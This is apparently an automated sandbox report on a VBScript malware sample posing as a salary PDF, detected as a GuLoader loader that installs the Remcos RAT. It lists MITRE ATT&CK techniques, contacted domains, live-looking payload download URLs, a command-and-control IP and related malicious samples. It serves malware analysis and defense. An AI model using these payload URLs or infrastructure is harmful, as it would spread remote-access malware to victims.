Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6648, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\msiexec.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB

Source: Yara match	File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	11 Windows Management Instrumentation	321 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	412 Process Injection	1 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	22 Command and Scripting Interpreter	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Salary Revision_pdf.vbs	13%	ReversingLabs	Script-WScript.Trojan.GuLoader

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://www.imvu.comr	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.imvu.com	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.yahoo.com/config/login	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.ebuddy.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	false		unknown
sf4l.shop	188.114.97.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin	false		unknown
https://sf4l.shop/zWAbmrmP/Diwani.pfb	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P	bhv528A.tmp.11.dr	false		unknown
https://www.office.com/	bhv528A.tmp.11.dr	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9	bhv528A.tmp.11.dr	false		unknown
http://www.imvu.comr	msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sf4l.shop/	msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpl	msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aefd.nelreports.net/api/report?cat=bingth	bhv528A.tmp.11.dr	false		unknown
https://go.micro	powershell.exe, 00000002.00000002.1487804584.000001C4E55FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpp	msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.imvu.com	msiexec.exe, msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aefd.nelreports.net/api/report?cat=wsb	bhv528A.tmp.11.dr	false		unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.imvu.comppData	msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.nirsoft.net	msiexec.exe, 0000000B.00000002.1811369548.00000000029A2000.00000004.00000010.00020000.00000000.sdmp	false		unknown
https://aefd.nelreports.net/api/report?cat=bingaotak	bhv528A.tmp.11.dr	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	bhv528A.tmp.11.dr	false		unknown
https://deff.nelreports.net/api/report?cat=msn	bhv528A.tmp.11.dr	false	URL Reputation: safe	unknown
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05	bhv528A.tmp.11.dr	false		unknown
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58	bhv528A.tmp.11.dr	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sf4l.shop	powershell.exe, 00000002.00000002.1487804584.000001C4E66A9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://sf4l.shop/zWAbmrmP/Diwani.pfbP	powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com	msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://aefd.nelreports.net/api/report?cat=bingaot	bhv528A.tmp.11.dr	false		unknown
https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb	bhv528A.tmp.11.dr	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat	bhv528A.tmp.11.dr	false		unknown
https://sf4l.shop	powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1487804584.000001C4E640C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzw	msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aefd.nelreports.net/api/report?cat=bingrms	bhv528A.tmp.11.dr	false		unknown
https://www.google.com/accounts/servicelogin	msiexec.exe	false		unknown
https://login.yahoo.com/config/login	msiexec.exe	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nirsoft.net/	msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sf4l.shop/zWAbmrmP/Diwani.pfbXR	powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&	bhv528A.tmp.11.dr	false		unknown
http://www.ebuddy.com	msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	sf4l.shop	European Union	13335	CLOUDFLARENETUS	false
154.216.18.214	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538691
Start date and time:	2024-10-21 17:04:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Salary Revision_pdf.vbs
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@16/12@2/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 170 Number of non-executed functions: 265
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7844 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Salary Revision_pdf.vbs

Simulations

Behavior and APIs

Time	Type	Description
11:05:16	API Interceptor	1x Sleep call for process: wscript.exe modified
11:05:24	API Interceptor	81x Sleep call for process: powershell.exe modified
11:06:34	API Interceptor	460614x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	request-BPp -RFQ 0975432.exe	Get hash	malicious	PureLog Stealer	Browse	www.ergeneescortg.xyz/guou/
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	www.thetahostthe.top/9r5x/
	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	ZP4KZDHVHWZZ2DC13DMX.exe	Get hash	malicious	Amadey	Browse	tipinfodownload-soft1.com/g9jvjfd73/index.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/loadbit
	PO#071024.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	www.ergeneescortg.xyz/guou/
154.216.18.214	CI+PL_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse
	MV STARSHIP AQUILA_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse
	September Report 24'.vbs	Get hash	malicious	Remcos, GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	Order.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SKM_0001810-01-2024-GL-3762.bat	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	nicetokissthebestthingsiwantotgetmebackwith.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://lambdachi.univer.se/	Get hash	malicious	Unknown	Browse	104.17.25.14
	INV00663.docx	Get hash	malicious	HTMLPhisher	Browse	104.26.12.222
	https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f	Get hash	malicious	Unknown	Browse	104.17.25.14
	index.html	Get hash	malicious	Unknown	Browse	104.18.24.163
	8VYDvQtXBH.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	http://tfmk.sweepshop.info/fwd/P2Q9OTU0NCZlaT00NDM2NzYzMSZpZj0zMTYwJmxpPTczNw	Get hash	malicious	Phisher	Browse	104.26.14.63
	index.html	Get hash	malicious	Unknown	Browse	104.18.24.163
	https://anviict.com/?qvtvxymb	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	message(1).eml	Get hash	malicious	Unknown	Browse	104.16.79.73
	file.exe	Get hash	malicious	LummaC, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
ATOM86-ASATOM86NL	Order.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	duEsmKBlGr.exe	Get hash	malicious	Unknown	Browse	178.237.33.50
	lA0Z0vjXfA.exe	Get hash	malicious	Unknown	Browse	178.237.33.50
	172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SKM_0001810-01-2024-GL-3762.bat	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exe	Get hash	malicious	Unknown	Browse	178.237.33.50
	Ibnh3BCQSQ.exe	Get hash	malicious	Unknown	Browse	178.237.33.50
	nicetokissthebestthingsiwantotgetmebackwith.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	178.237.33.50
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	Order.vbs	Get hash	malicious	Remcos	Browse	154.216.17.141
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.17.159
	bot.mips.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.mpsl.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.17.159
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	154.216.17.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Order.vbs	Get hash	malicious	Remcos	Browse	188.114.97.3
	index.html	Get hash	malicious	Unknown	Browse	188.114.97.3
	Ricevuta_di_pagamento.vbs	Get hash	malicious	GuLoader	Browse	188.114.97.3
	https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	188.114.97.3
	https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29t	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	188.114.97.3
	index.html	Get hash	malicious	Unknown	Browse	188.114.97.3
	TENDER ADDENDUM NO. 01.vbs	Get hash	malicious	GuLoader	Browse	188.114.97.3
	IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3
	RFQ 1307.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs	Get hash	malicious	GuLoader	Browse	188.114.97.3
37f463bf4616ecd445d4a1937da06e19	Ricevuta_di_pagamento.vbs	Get hash	malicious	GuLoader	Browse	188.114.97.3
	8VYDvQtXBH.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	proforma.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.97.3
	IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	FACTURA RAGOZA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	FACTURA DE PAGO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.1379890379152853
Encrypted:	false
SSDEEP:	6:kKd/pi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5pdDnLNkPlE99SNxAhUe/3
MD5:	3BB384B43468CD2AA2D078DAB0376196
SHA1:	877C2AEEA88F91E135206B1C97FD814DC3AF066E
SHA-256:	945B2DA0857715CD85E7EA593770C1E95FBAF1AA8B7DF4097197E9017C143974
SHA-512:	B5234CB152054BCF942BF0E49DBF1C475C2867693CE295FB36BCAE21F3830A6EAF29DE68B93085B1AA9D12034DFA3116405A94B1C5D6AEC370C39B087564DE90
Malicious:	false
Preview:	p...... .............#..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	960
Entropy (8bit):	5.007342357625525
Encrypted:	false
SSDEEP:	12:tkhEVBnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkL:qhEV1dRNuKyGX85jvXhNlT3/73clHWro
MD5:	C0019D314FB1788D8FE8CBC65C3B6E7B
SHA1:	CC5D5544960CF2DF1776E2BD23622373298DB55D
SHA-256:	C6869361FD0119B2A0E2F96D90D40D92FF66EA71BC3829C0061C51630F3B75FF
SHA-512:	192BB1AF8F9E1BCFF6AC5C7A4B8837677EF2A77BEE9FF78C47F2AB6EA246F98D3FDE8C327C8F594D2A5B4E5DDC76F4377F48E9567970D31B250D2A829B8A2096
Malicious:	false
